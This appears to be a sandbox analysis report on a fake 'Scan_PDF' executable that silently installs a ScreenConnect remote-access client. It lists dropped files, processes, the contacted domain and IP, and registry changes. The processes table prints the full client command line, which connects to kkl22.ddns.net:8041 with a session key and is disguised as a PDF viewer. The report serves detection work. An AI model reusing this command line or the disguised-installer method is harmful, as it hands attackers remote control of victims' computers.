Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Scan_PDF_2017163298.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
 |
|
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan_PDF_2017163298.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Config.Msi\5096ec.rbs
|
data
|
modified
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.Override.en-US.resources
|
data
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.Override.resources
|
data
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.en-US.resources
|
data
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.resources
|
data
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\app.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\system.config
|
XML 1.0 document, ASCII text, with very long lines (456), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI9390.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\CustomAction.config
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.Compression.Cab.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.Compression.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.WindowsInstaller.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\ScreenConnect.Core.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\ScreenConnect.InstallerActions.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\ScreenConnect.Windows.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation
Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision
Number: {F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug
13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701),
Security: 2
|
dropped
|
||
|
C:\Windows\Installer\5096eb.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation
Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision
Number: {F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug
13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701),
Security: 2
|
dropped
|
||
|
C:\Windows\Installer\5096ed.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation
Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision
Number: {F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug
13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701),
Security: 2
|
dropped
|
||
|
C:\Windows\Installer\MSI996C.tmp
|
data
|
dropped
|
||
|
C:\Windows\Installer\MSI998C.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Windows\Installer\MSI9EDC.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Windows\Installer\SourceHash{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Installer\inprogressinstallinfo.ipi
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Installer\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}\DefaultIcon
|
MS Windows icon resource - 3 icons, 16x16, 4 bits/pixel, 32x32, 4 bits/pixel
|
dropped
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\uoybbna4.newcfg
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
modified
|
||
|
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\user.config (copy)
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\Temp\~DF161A382130B441CA.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF2B0CA6DD6C8EE481.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF2E521FA16BEE74A3.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF388354E16459BDC4.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF57E736AF994180DA.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF5FB71B1E9DC95398.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF735EBF64C9D363C0.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF7E4AD7CDFCA72B17.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF93E940DB0387AC90.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DFE110029DAC99949F.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DFE84B9698FB3E4FDE.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DFEA1EADA952469AD5.TMP
|
data
|
dropped
|
There are 47 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\Scan_PDF_2017163298.exe
|
"C:\Users\user\Desktop\Scan_PDF_2017163298.exe"
|
|
|
|
C:\Windows\System32\msiexec.exe
|
C:\Windows\system32\msiexec.exe /V
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
|
"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kkl22.ddns.net&p=8041&s=478e82c1-db06-42e2-b73b-60fd80c17bc4&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=scan_pdf&c=windows%20pdf%20viewer&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c="
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
|
"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "600c2429-3619-41f2-bc1a-bc0ec60c72d7"
"User"
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
|
"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "be73d786-925b-47a5-99df-a44cdbf0e1aa"
"System"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding F709E0C1738E8A53DFEDA48789872001 C
|
||
|
C:\Windows\SysWOW64\rundll32.exe
|
rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI9390.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5280796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding 44B43403CFD66C9CC500A14417CF0426
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding E44ABF9CE7CBB19DDF57A0D6AD3151E3 E Global\MSI0000
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://wixtoolset.org/releases/
|
unknown
|
||
|
http://wixtoolset.org/news/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
|
unknown
|
||
|
https://feedback.screenconnect.com/Feedback.axd
|
unknown
|
||
|
https://docs.rs/getrandom#nodejs-es-module-support
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
kkl22.ddns.net
|
188.119.113.59
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.119.113.59
|
kkl22.ddns.net
|
Russian Federation
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa
|
Authentication Packages
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Owner
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
SessionHash
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Sequence
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Config.Msi\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
|
C:\Config.Msi\5096ec.rbs
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
|
C:\Config.Msi\5096ec.rbsLow
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\ECA6CD7F99528C9229C5B5A3CC99D4F1
|
D92D2B5F2F6B5294C50B8E8EAE9834D1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5283F57ED5163C6A818A8A1161EBB1A2
|
D92D2B5F2F6B5294C50B8E8EAE9834D1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B06603D19278B80B5232D336168F335F
|
D92D2B5F2F6B5294C50B8E8EAE9834D1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A1F4DF55221E9D239E861E9AB278A4A9
|
D92D2B5F2F6B5294C50B8E8EAE9834D1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9E9DED4CDF5ACF58864B7AC15417DF1D
|
D92D2B5F2F6B5294C50B8E8EAE9834D1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\14AA0CD5258905F0D6FD710F28596A13
|
D92D2B5F2F6B5294C50B8E8EAE9834D1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\195432AE4E1CE7DEDD30F3C30EC54D0E
|
D92D2B5F2F6B5294C50B8E8EAE9834D1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa
|
URL Protocol
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa
|
UseOriginalUrlEncoding
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa\shell\open\command
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (e6cb77284cf765aa)
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\InprocServer32
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\InprocServer32
|
ThreadingModel
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
LocalPackage
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
AuthorizedCDFPrefix
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
Comments
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
Contact
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
DisplayVersion
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
HelpLink
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
HelpTelephone
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
InstallDate
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
InstallLocation
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
InstallSource
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
ModifyPath
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
NoModify
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
NoRepair
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
Publisher
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
Readme
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
Size
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
EstimatedSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
UninstallString
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
URLInfoAbout
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
URLUpdateInfo
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
VersionMajor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
VersionMinor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
WindowsInstaller
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
Version
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
Language
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
AuthorizedCDFPrefix
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
Comments
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
Contact
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
DisplayVersion
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
HelpLink
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
HelpTelephone
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
InstallDate
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
InstallLocation
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
InstallSource
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
ModifyPath
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
NoModify
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
NoRepair
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
Publisher
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
Readme
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
Size
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
EstimatedSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
UninstallString
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
URLInfoAbout
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
URLUpdateInfo
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
VersionMajor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
VersionMinor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
WindowsInstaller
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
Version
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
Language
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\C18BA22B6B7B3C7E6EBC7782C47F56AA
|
D92D2B5F2F6B5294C50B8E8EAE9834D1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\InstallProperties
|
DisplayName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}
|
DisplayName
|
||
|
